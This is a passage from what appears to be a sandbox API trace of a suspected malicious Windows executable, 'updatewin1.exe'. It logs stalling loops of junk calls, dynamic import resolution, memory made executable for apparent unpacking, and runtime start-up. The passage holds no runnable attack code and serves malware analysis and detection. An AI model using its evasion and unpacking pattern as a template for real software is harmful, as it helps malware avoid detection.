nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.825] AddAtomA (lpString=0x0) returned 0x0 [0043.825] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.825] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.825] AddAtomA (lpString=0x0) returned 0x0 [0043.825] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.825] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.825] AddAtomA (lpString=0x0) returned 0x0 [0043.825] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.825] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.825] AddAtomA (lpString=0x0) returned 0x0 [0043.825] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.825] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.825] AddAtomA (lpString=0x0) returned 0x0 [0043.825] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.825] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.825] AddAtomA (lpString=0x0) returned 0x0 [0043.825] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.825] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.825] AddAtomA (lpString=0x0) returned 0x0 [0043.825] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.825] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.825] AddAtomA (lpString=0x0) returned 0x0 [0043.825] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.825] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.825] AddAtomA (lpString=0x0) returned 0x0 [0043.825] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.825] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.825] AddAtomA (lpString=0x0) returned 0x0 [0043.825] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.825] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.825] AddAtomA (lpString=0x0) returned 0x0 [0043.825] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.826] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.826] AddAtomA (lpString=0x0) returned 0x0 [0043.826] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.826] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.826] AddAtomA (lpString=0x0) returned 0x0 [0043.826] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.826] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.844] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76c20000 [0043.844] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0043.844] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0043.844] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0043.844] GetProcAddress (hModule=0x76c20000, lpProcName="GetVersionExA") returned 0x76c33519 [0043.844] GetProcAddress (hModule=0x76c20000, lpProcName="TerminateProcess") returned 0x76c4d802 [0043.844] GetProcAddress (hModule=0x76c20000, lpProcName="ExitProcess") returned 0x76c37a10 [0043.844] GetProcAddress (hModule=0x76c20000, lpProcName="SetErrorMode") returned 0x76c31b00 [0043.844] SetErrorMode (uMode=0x400) returned 0x0 [0043.844] SetErrorMode (uMode=0x0) returned 0x400 [0043.844] GetVersionExA (in: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}\x16w") | out: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0043.845] VirtualAlloc (lpAddress=0x0, dwSize=0x2d200, flAllocationType=0x1000, flProtect=0x4) returned 0x1a0000 [0043.850] VirtualProtect (in: lpAddress=0x400000, dwSize=0x32000, flNewProtect=0x40, lpflOldProtect=0x18f5d8 | out: lpflOldProtect=0x18f5d8*=0x2) returned 1 [0043.878] VirtualFree (lpAddress=0x1a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0043.879] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76c20000 [0043.879] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileA") returned 0x76c353c6 [0043.879] GetProcAddress (hModule=0x76c20000, lpProcName="WriteFile") returned 0x76c31282 [0043.879] GetProcAddress (hModule=0x76c20000, lpProcName="FlushFileBuffers") returned 0x76c3469b [0043.879] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0043.879] GetProcAddress (hModule=0x76c20000, lpProcName="CreateProcessA") returned 0x76c31072 [0043.879] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcpyW") returned 0x76c53102 [0043.879] GetProcAddress (hModule=0x76c20000, lpProcName="CreateProcessW") returned 0x76c3103d [0043.879] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForSingleObject") returned 0x76c31136 [0043.880] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileW") returned 0x76c33f5c [0043.880] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0043.880] GetProcAddress (hModule=0x76c20000, lpProcName="WideCharToMultiByte") returned 0x76c3170d [0043.880] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0043.880] GetProcAddress (hModule=0x76c20000, lpProcName="GetCommandLineW") returned 0x76c35223 [0043.880] GetProcAddress (hModule=0x76c20000, lpProcName="WriteConsoleW") returned 0x76c57aca [0043.880] GetProcAddress (hModule=0x76c20000, lpProcName="SetFilePointerEx") returned 0x76c4c807 [0043.880] GetProcAddress (hModule=0x76c20000, lpProcName="GetConsoleMode") returned 0x76c31328 [0043.880] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteFileA") returned 0x76c35444 [0043.880] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0043.880] GetProcAddress (hModule=0x76c20000, lpProcName="HeapSize") returned 0x77163002 [0043.880] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0043.880] GetProcAddress (hModule=0x76c20000, lpProcName="LCMapStringW") returned 0x76c317b9 [0043.880] GetProcAddress (hModule=0x76c20000, lpProcName="GetStringTypeW") returned 0x76c31946 [0043.880] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileType") returned 0x76c33531 [0043.880] GetProcAddress (hModule=0x76c20000, lpProcName="SetStdHandle") returned 0x76cb454f [0043.880] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0043.881] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcpyA") returned 0x76c52a9d [0043.881] GetProcAddress (hModule=0x76c20000, lpProcName="GetEnvironmentVariableA") returned 0x76c333a0 [0043.881] GetProcAddress (hModule=0x76c20000, lpProcName="GetShortPathNameA") returned 0x76c5594d [0043.881] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0043.881] GetProcAddress (hModule=0x76c20000, lpProcName="GetConsoleCP") returned 0x76cd7bff [0043.881] GetProcAddress (hModule=0x76c20000, lpProcName="SetLastError") returned 0x76c311a9 [0043.881] GetProcAddress (hModule=0x76c20000, lpProcName="FreeEnvironmentStringsW") returned 0x76c351cb [0043.881] GetProcAddress (hModule=0x76c20000, lpProcName="GetEnvironmentStringsW") returned 0x76c351e3 [0043.881] GetProcAddress (hModule=0x76c20000, lpProcName="GetCommandLineA") returned 0x76c351a1 [0043.881] GetProcAddress (hModule=0x76c20000, lpProcName="GetCPInfo") returned 0x76c35189 [0043.881] GetProcAddress (hModule=0x76c20000, lpProcName="GetOEMCP") returned 0x76c5d1a1 [0043.881] GetProcAddress (hModule=0x76c20000, lpProcName="IsValidCodePage") returned 0x76c34493 [0043.881] GetProcAddress (hModule=0x76c20000, lpProcName="UnhandledExceptionFilter") returned 0x76c5772f [0043.881] GetProcAddress (hModule=0x76c20000, lpProcName="SetUnhandledExceptionFilter") returned 0x76c387c9 [0043.881] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcess") returned 0x76c31809 [0043.881] GetProcAddress (hModule=0x76c20000, lpProcName="TerminateProcess") returned 0x76c4d802 [0043.881] GetProcAddress (hModule=0x76c20000, lpProcName="IsProcessorFeaturePresent") returned 0x76c35235 [0043.882] GetProcAddress (hModule=0x76c20000, lpProcName="QueryPerformanceCounter") returned 0x76c31725 [0043.882] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0043.882] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0043.882] GetProcAddress (hModule=0x76c20000, lpProcName="GetSystemTimeAsFileTime") returned 0x76c33509 [0043.882] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeSListHead") returned 0x771694a4 [0043.882] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0043.882] GetProcAddress (hModule=0x76c20000, lpProcName="GetStartupInfoW") returned 0x76c34d40 [0043.882] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleW") returned 0x76c334b0 [0043.882] GetProcAddress (hModule=0x76c20000, lpProcName="RtlUnwind") returned 0x76c5d1c3 [0043.882] GetProcAddress (hModule=0x76c20000, lpProcName="RaiseException") returned 0x76c358a6 [0043.882] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0043.882] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0043.882] GetProcAddress (hModule=0x76c20000, lpProcName="EnterCriticalSection") returned 0x771522b0 [0043.882] GetProcAddress (hModule=0x76c20000, lpProcName="LeaveCriticalSection") returned 0x77152270 [0043.882] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteCriticalSection") returned 0x771645f5 [0043.882] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76c31916 [0043.883] GetProcAddress (hModule=0x76c20000, lpProcName="TlsAlloc") returned 0x76c349ad [0043.883] GetProcAddress (hModule=0x76c20000, lpProcName="TlsGetValue") returned 0x76c311e0 [0043.883] GetProcAddress (hModule=0x76c20000, lpProcName="TlsSetValue") returned 0x76c314fb [0043.883] GetProcAddress (hModule=0x76c20000, lpProcName="TlsFree") returned 0x76c33587 [0043.883] GetProcAddress (hModule=0x76c20000, lpProcName="FreeLibrary") returned 0x76c334c8 [0043.883] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0043.883] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryExW") returned 0x76c3495d [0043.883] GetProcAddress (hModule=0x76c20000, lpProcName="GetStdHandle") returned 0x76c351b3 [0043.883] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameW") returned 0x76c34950 [0043.883] GetProcAddress (hModule=0x76c20000, lpProcName="ExitProcess") returned 0x76c37a10 [0043.883] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleExW") returned 0x76c34a6f [0043.883] GetProcAddress (hModule=0x76c20000, lpProcName="GetACP") returned 0x76c3179c [0043.883] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0043.883] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0043.883] GetProcAddress (hModule=0x76c20000, lpProcName="FindClose") returned 0x76c34442 [0043.883] GetProcAddress (hModule=0x76c20000, lpProcName="FindFirstFileExW") returned 0x76c41811 [0043.883] GetProcAddress (hModule=0x76c20000, lpProcName="FindNextFileW") returned 0x76c354ee [0043.884] GetProcAddress (hModule=0x76c20000, lpProcName="DecodePointer") returned 0x77169d35 [0043.884] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0043.884] GetProcAddress (hModule=0x74d40000, lpProcName="RegOpenKeyExW") returned 0x74d5468d [0043.884] GetProcAddress (hModule=0x74d40000, lpProcName="RegCloseKey") returned 0x74d5469d [0043.884] GetProcAddress (hModule=0x74d40000, lpProcName="RegCreateKeyExW") returned 0x74d540fe [0043.884] GetProcAddress (hModule=0x74d40000, lpProcName="SetSecurityDescriptorDacl") returned 0x74d5415e [0043.884] GetProcAddress (hModule=0x74d40000, lpProcName="InitializeSecurityDescriptor") returned 0x74d54620 [0043.884] GetProcAddress (hModule=0x74d40000, lpProcName="RegSetValueExW") returned 0x74d514d6 [0043.884] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75fd0000 [0043.884] GetProcAddress (hModule=0x75fd0000, lpProcName="ShellExecuteExW") returned 0x75ff1e46 [0043.884] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0043.884] GetProcAddress (hModule=0x75fd0000, lpProcName="CommandLineToArgvW") returned 0x75fe9ee8 [0043.884] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x75340000 [0043.884] GetProcAddress (hModule=0x75340000, lpProcName="PathAppendW") returned 0x753581ef [0043.885] GetProcAddress (hModule=0x75340000, lpProcName="PathFileExistsA") returned 0x7537ad1a [0043.885] GetProcAddress (hModule=0x75340000, lpProcName="PathRemoveFileSpecW") returned 0x75353248 [0043.885] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x749c0000 [0043.929] GetProcAddress (hModule=0x749c0000, lpProcName="atexit") returned 0x749dc544 [0043.929] atexit (param_1=0x2963d8) returned 0 [0043.930] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f5dc | out: lpSystemTimeAsFileTime=0x18f5dc*(dwLowDateTime=0x188a2bb0, dwHighDateTime=0x1d5956a)) [0043.930] GetCurrentThreadId () returned 0x9ec [0043.930] GetCurrentProcessId () returned 0x9e8 [0043.930] QueryPerformanceCounter (in: lpPerformanceCount=0x18f5d4 | out: lpPerformanceCount=0x18f5d4*=16410919792) returned 1 [0043.947] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0043.948] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0043.948] GetLastError () returned 0x57 [0043.948] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0043.949] GetLastError () returned 0x57 [0043.949] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76c20000 [0043.949] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionEx") returned 0x76c34d28 [0043.949] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0043.949] GetLastError () returned 0x57 [0043.949] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0043.949] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208 [0043.950] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0043.950] GetLastError () returned 0x57 [0043.950] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0043.950] GetLastError () returned 0x57 [0043.951] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76c20000 [0043.951] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionEx") returned 0x76c34d28 [0043.951] GetProcessHeap () returned 0x280000 [0043.951] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0043.951] GetLastError () returned 0x57 [0043.951] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0043.951] GetLastError () returned 0x57 [0043.951] GetProcAddress (hModule=0x76c20000, lpProcName="FlsGetValue") returned 0x76c31252 [0043.952] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x364) returned 0x2aa9e8 [0043.952] SetLastError (dwErrCode=0x57) [0043.953] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xc00) returned 0x2aad58 [0043.954] GetStartupInfoW (in: lpStartupInfo=0x18f510 | out: lpStartupInfo=0x18f510*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4033b0, hStdOutput=0xcb2cd881, hStdError=0xfffffffe)) [0043.954] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0043.954] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0043.954] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0043.954] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe\" " [0043.954] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe\" " [0043.954] IsValidCodePage (CodePage=0x4e4) returned 1 [0043.954] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f530 | out: lpCPInfo=0x18f530) returned 1 [0043.954] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18edf8 | out: lpCPInfo=0x18edf8) returned 1 [0043.954] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0043.954] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb98, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0043.954] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18ee0c | out: lpCharType=0x18ee0c) returned 1 [0043.955] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0043.955] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā") returned 256 [0043.955] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0043.955] GetLastError () returned 0x57 [0043.955] GetProcAddress (hModule=0x76c20000, lpProcName="LCMapStringEx") returned 0x76cb47f1 [0043.955] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0043.955] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x18e938, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0043.955] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18f30c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿY}uËHõ\x18", lpUsedDefaultChar=0x0) returned 256 [0043.955] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0043.955] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0043.955] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 